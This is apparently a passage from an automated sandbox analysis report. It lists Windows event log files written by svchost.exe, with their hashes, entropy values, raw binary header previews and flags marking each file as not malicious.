                                                      Preview:ElfChnk......................................"...&.....k.....................................................................n..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................."..................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.9223892466691472
                                                      Encrypted:false
                                                      SSDEEP:384:whqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28t:wbCyhLfIXBS5
                                                      MD5:93BC7C28E3A7B0EC7634432FFB5F26AE
                                                      SHA1:388548D6291DA80F672153D1C18E32BDA335AA90
                                                      SHA-256:D354F4EA745283540D197B6D4C57EFC4F539F7566CFB3A06AEBD1243CD222EE1
                                                      SHA-512:3235FEA5A58C72DCD680D436AA2652F5221C6AC6F5A53882C7817A8A65E63C13087CD5660839FC7CFA0F62C666014608B91ABB4235EF5F79F68EF5806252F84A
                                                      Malicious:false
                                                      Preview:ElfChnk.........F...............F...............P............................................................................*................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n...................................................6...................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.838106263184782
                                                      Encrypted:false
                                                      SSDEEP:768:ccMhFBuyKskZljdoKXjtT/r18rQXn8r3e5POH:JMhFBuVge
                                                      MD5:A2D41740C1BAF781019F282E37288DDF
                                                      SHA1:A6FE635B3EC8A6923EDE10C23FC79DD32EF4F621
                                                      SHA-256:7008D3010B17C0B09643D10D26B19FB971BB1963C414C1466BEAD617CF9F15E7
                                                      SHA-512:E33A0A2F9473D2D05E9704FE16E6EE34FB51FD8E25A3D60E1F7A67665CA14421B6511D896526AFC7CAE1BF629BB7013FA10663620C5450F1BB51A465EF5A51CB
                                                      Malicious:false
                                                      Preview:ElfChnk.........?...............?...................<.md.....................................................................?.Q................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A......&...................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.634418630947688
                                                      Encrypted:false
                                                      SSDEEP:768:/VQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZaUeI36ISKEeKRe:cH
                                                      MD5:A00BAFFCABB00428EA0512FCECCC55E5
                                                      SHA1:19F7C942DC26C3FF56D6240158734AFF67D6B93E
                                                      SHA-256:92264C9E28AB541669DED47CFAF1E818EBD863FA9E8FC6B0F52175D694A9E0D9
                                                      SHA-512:DF94AA8FA0610A0EFE7BAC0DB2A01645A4CD1C7FAD62E914EF914B526B651ED62600F63909D26149FD17C259348DADE05F48759B1DF092970251DB86690CC2B6
                                                      Malicious:false
                                                      Preview:ElfChnk.........m...............m.....................]......................................................................p.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................................%0......**..@...........WW. ..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.0646587531847893
                                                      Encrypted:false
                                                      SSDEEP:384:eh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDK:eMAP1Qa5AgfQQgniwS
                                                      MD5:399CAF70AC6E1E0C918905B719A0B3DD
                                                      SHA1:62360CD0CA66E23C70E6DE3340698E7C0D789972
                                                      SHA-256:FD081487CCB0ACEAD6F633AADBA4B977D2C9360CE8EAC36EAB4E3C84A701D849
                                                      SHA-512:A3E17DA61D4F7C0C94FD0B67707AE35250656842D602906DE515B5E46ECD5078AC68AE607B99DC1A6061B0F896759FE46FF8EE350774205635D30363D46939EA
                                                      Malicious:false
                                                      Preview:ElfChnk......................................g...j..%s.g........................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&...........c..;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.4364303862010575
                                                      Encrypted:false
                                                      SSDEEP:384:PhrE2E+EAsbE3VgEWsUiEcEf4eEOhEmELVFEEE5ejElEreEFEzEAEWE+EWEeEKEy:P3sleByhfIwPGa1SEzy
                                                      MD5:2BB73ACC8F7419459C4BF931AB85352C
                                                      SHA1:F1CE2EB960D3886F76094E2327DD092FC1208C7E
                                                      SHA-256:1969400F6FC72AD4A41092FEC53A19078C98DE9FCB2507A3BD8E1930B2447B62
                                                      SHA-512:7D882184DA11B490E111502C8193B73248259D43CC5DCE021CD7264212F1BCD3D62F2A3A2F86929663E2E904961D4F1E406E314020FE904D41694A09C1EB0457
                                                      Malicious:false
                                                      Preview:ElfChnk.p...............p..................../...1..V......................................................................H...................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................m................*..............%................ ..................&............0......................**......p..........T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.0631557320109892
                                                      Encrypted:false
                                                      SSDEEP:384:xhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3KlZ:x1T4hGvj
                                                      MD5:86AEA3A9CA3E5909FD44812754E52BD6
                                                      SHA1:F79B583F83F118AC724A5A4206FC439B88BB8C65
                                                      SHA-256:2AB21F158F9FFA0A375B2ABBD58880A732FABBC436246D40A68DD88D324428C9
                                                      SHA-512:17796DAA6BCE3C6B7EBACD2A683D085AB08C7701DB5FF91DC2D6531E9CC23FCFC52650A6CD02D8B54D4E8C8D5B59DB1688E18571587E0431E4AA914086BE26F5
                                                      Malicious:false
                                                      Preview:ElfChnk.........b...............b...............0...o5@r.....................................................................2..................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.4467272005363894
                                                      Encrypted:false
                                                      SSDEEP:384:EEhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjD6:JzSKEqsMuy6TN
                                                      MD5:155681C222D825199B738E8DEC707DC8
                                                      SHA1:704C800E7313F77A218203554E1428DF2819BC34
                                                      SHA-256:1505E543085CB6AA30119F10DF11AC8CE061DB0CAC6D44A640E711F96750C4BF
                                                      SHA-512:ADDDE8E26D330EAA13F993D17FF4A6DE7F4120E5B36205EB69FC999B0462B21FD189317EFD1002618551EE24E5C753A09EB34955E8CF1A8E2A22D27516BAB720
                                                      Malicious:false
                                                      Preview:ElfChnk.........L...............L...........x.......ZZO.........................................................................................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=............................................y..................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.156155224835584
                                                      Encrypted:false
                                                      SSDEEP:384:MhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zE:Mmw9g3LU
                                                      MD5:F22AC858C2ACC96E8F189E43FFE46FBD
                                                      SHA1:540B8276921D37FCFFDA3FC7BCFAE1D99A85433B
                                                      SHA-256:771A6E4098CB30081338F06DD7C0B54248C133F9B7B6849FDADDBD6E6FD5BCE9
                                                      SHA-512:B4CF3C51B9FB236207B19FE697CEF6E402C6C903E7570B3938F529E5438F96E230463B9A9B17784A98E580E2B18AA9626E96AA83F705D506AF9C2A0432F0F7D5
                                                      Malicious:false
                                                      Preview:ElfChnk.........6...............6........... o...p..k.?........................................................................x................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#...........................................~i..................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.9197999988543422
                                                      Encrypted:false
                                                      SSDEEP:384:ehqID7I26vIxIPIttIo0IPrI5IMILIjI7I1IIIfrIBBLIgITI:ecx
                                                      MD5:6C3F290FC62CFA9C240AEE8DB1DBA277
                                                      SHA1:CFACCF81F3AA31E8DE85CEAFDAA55AA90FA18BEC
                                                      SHA-256:7841FBB35636229AFB0389965D3DDBD0B7DF4858F1DA8A8FF434830DB8B133D6
                                                      SHA-512:D2C60875EFADB1F3421CDC095B00E32419C0266CB4F58B17AF09A82AAA20EB488C757BA07E7562A033B84A37B3E035C405200BFB29330F79CA565FF21F5EDA88
                                                      Malicious:false
                                                      Preview:ElfChnk.K.......L.......K.......L...........x...86.....U......................................................................+.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..x...K.........tQ..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 143, DIRTY
                                                      Category:dropped
                                                      Size (bytes):76040
                                                      Entropy (8bit):4.551396690032708
                                                      Encrypted:false
                                                      SSDEEP:768:9LjpPv++M48PFVbUa+5imKLjpPv++M48PFVbUa+5imyY20sMY3Dp13/n/ydIxm6c:LU
                                                      MD5:DD8F2B18604164909CECC144BBE4BD7F
                                                      SHA1:17D2C3BD695F4BBBEFBC4A2B27C053F345226CB1
                                                      SHA-256:1BFE963E4435F2ECA8114899514A58C40CF35D053BE299A06DE2CC49433B4959
                                                      SHA-512:2D1662B855CA588E61220072F36C9EE6E71F40268EE9AB0EED6980CCDE90F34EC66250B63427E9D8662A37E958055C4FDBBD92059CCA458018C5A0AFB5875DBF
                                                      Malicious:false
                                                      Preview:ElfFile.....................................................................................................................I..ElfChnk......................................$...(...n|V.....................................................................p$.................H.......................p...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......!............................................$..................................**..X.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-LiveId%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):5.718426658668259
                                                      Encrypted:false
                                                      SSDEEP:384:Thka5Ka5WsR9o2KbzyzIz7a5NsR9o2KbzyzIzia5zzuzNz0zxzuewKWMK/2a55wt:Tdqlt94xODljQdM
                                                      MD5:8630011707C7BFBCECC0A9430637802E
                                                      SHA1:22247A5B6A4C01883BB14E0BD4575A3553F945CB
                                                      SHA-256:227057F9899098B21709D53114E9DECFFCD28207BFFA178AD6B1E32F9C63EDDF
                                                      SHA-512:972629871B28EA6D01B8762B28378F8348E592BD465FE7FD1CF6AB5BD62157230AD3BB729F6290F6EDA950AB20598110676D902756E40BA3067ED37831855076
                                                      Malicious:false
                                                      Preview:ElfChnk.%......./.......%......./...........(l...n.........................................................................b\.;................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&........................6..........**..P...%.......'wu~..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.9963080376858662
                                                      Encrypted:false
                                                      SSDEEP:384:l7h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMLaMA0MJvMZy:l7eJw
                                                      MD5:A51AFE78FA4481FA05EDC1133C92B1D8
                                                      SHA1:5BA44E7A99EE615E323696742DA6B930E9FF6198
                                                      SHA-256:44C1977D16383DF6B1FFF8164F319DFD99092A124ABA7C7280D74A6BB8AD2094
                                                      SHA-512:792E5E8F5540DCA4B7F003C1043DCBC3E0EC3F23EC4A7B0FA84357F6ABDFD84122C124DBEA2B61D3B5CEED79A3E158DBE95DFCDB20EEAC433D9CDC29C3328F22
                                                      Malicious:false
                                                      Preview:ElfChnk......................................)..0-....\.....................................................................|..........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................)..................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.076996627399968
                                                      Encrypted:false
                                                      SSDEEP:384:Ihk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS12:IBjdjP0cs6N
                                                      MD5:A8ADBDC2B39B55444B2C844F7D81EBDE
                                                      SHA1:F97F40E314C8A2A39953A28CB72C9270D3073418
                                                      SHA-256:93CF0EF4C121FCBB18A8A6DA5912415AF1113816BE6A8F9B86BE6A2243408E09
                                                      SHA-512:922D165CBE871A393D58DAABABE7D09557E242BF73C2C473C29CCB0FB3277B8119911EFF51B12238D23B613AD9C15DAB163C9757BC9006D768B2345F53436E7B
                                                      Malicious:false
                                                      Preview:ElfChnk.........................................X...Y}.......................................................................(.[................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.227362522701697
                                                      Encrypted:false
                                                      SSDEEP:384:GhhDIEQAGxIHIFIWInIfEITQIAIQIfID8IaxIcI8IfRITGIHUI6IwI2IVIWIfRGq:GhZxGp9I1M
                                                      MD5:AC029715F2D314666C7D30FF3AB6CCBF
                                                      SHA1:B71AAD56B7FDBB8EC118A7FB3DD0FE88FC7DDC77
                                                      SHA-256:905A3299B1C8F91D518A6A815916796C96C5CB2F28085303310EAB99E5EDF123
                                                      SHA-512:209BEBDF4EAEBB34474AA4C2F51B97363D2F2A14824FAB6ADB22C53C0BE32738CAB1300FBB5C482BFF6001BDDE81E414E0CACED23A6BC4CEDFFEFF8F99B61FBD
                                                      Malicious:false
                                                      Preview:ElfChnk.T...............T...................P...h..............................................................................+........................................>...=...........................................................................................................................f...............?...........................m...................M...F............................................................n..................1................................a......a...........................**......T.......B..d..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.801423310886069
                                                      Encrypted:false
                                                      SSDEEP:384:dh6iIvcImIvITIQIoIoI3IEIMIoIBIDIcIwISIEzIJVI:doxJS
                                                      MD5:9EAAD7982F42DFF47B8EF784DD2EE1CC
                                                      SHA1:542608204AF6B709B06807E9466F7543C0F08818
                                                      SHA-256:5468A48533B56DE3E8C820B870493154775356CE3913AD70EC51E0D1D0D1A366
                                                      SHA-512:036BFABE2AC4AD623B5C439349938C0EA254BFCDAB9096A53253189D4F632A8A8A1DD00644A4573AF971AAEA6831317BFD663E35363DD870684CDD4C0A51884C
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................X ...#..\.N......................................................................12.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................~ ..................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.996272372482282
                                                      Encrypted:false
                                                      SSDEEP:768:e4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH137:M
                                                      MD5:4F68D6AF0C7DB9E98F8B592C9A07811C
                                                      SHA1:9F519109344DD57150F16B540AAA417483EF44FE
                                                      SHA-256:44177E6F71E240EBFE9CE63FEFBF5D46A01979E09C0C14F65F1D19AE8E97B8EE
                                                      SHA-512:E1D5097BCD572F3DBAF4024FAEA76BAD3061CD2E05017701B578020327969C2BD3F725FBE8BFE4C40DC66336CE1371E7AB037058603B02449366DAE4EDE8DE69
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................(...8...S......................................................................V..C................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ..................................................N...................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):76320
                                                      Entropy (8bit):3.9184731745191157
                                                      Encrypted:false
                                                      SSDEEP:768:IvlWkvlWhjV8k+u7eUtHpoVPGWUy07SZRcZv76NcRkpHrWbGyYKQc90X0Ozth0B8:ljV8k+u7PtHpoVPGxWzthf
                                                      MD5:FCC2754991B7A152B99780BE4089C65B
                                                      SHA1:A345FCB6676F05EE3D1D50DC046BA451DBEC1B04
                                                      SHA-256:B6474C11999A1865611910FCD2887FCCC172B283589DCC89A38B3ABF14939CF2
                                                      SHA-512:A4D44C04B24B9CA752A30F7651DF71D9874FAA2D88906622DFE919036D341B20F0C4C34F87A7203CAA7DE7068CB0B1B20840439C216269E00605C4D31496BFCF
                                                      Malicious:false
                                                      Preview:ElfChnk.................P.......U...............x......w........................................................................................ ...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..P...P........\.o..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.738342213258453
                                                      Encrypted:false
                                                      SSDEEP:384:Dh+rKvKaKNP6WKkvKWKlpKuyK7YKmKaKHxqKWyK11KUIKqKq9KLjK5yKoKfKYKnr:DkN2cTOsKAnIpVESEbxNrjzDbRt
                                                      MD5:F971745114B36581EA6020128FB66F9D
                                                      SHA1:B1D2B9476CDA4074E532246D6B5A8D944026B2B9
                                                      SHA-256:1459D62063A0C0B38B90B3C6349D4B849CED19A11746DC585FC2BE65A0F39C62
                                                      SHA-512:D3BDA44556710BE15798E77091F459D53DCF5BB0DC7FCA660BDAA6DC1BFD963FA3238074E33D49B161258C6FDAA88DA723344A396B41EE47CE5F878A6D5967B4
                                                      Malicious:false
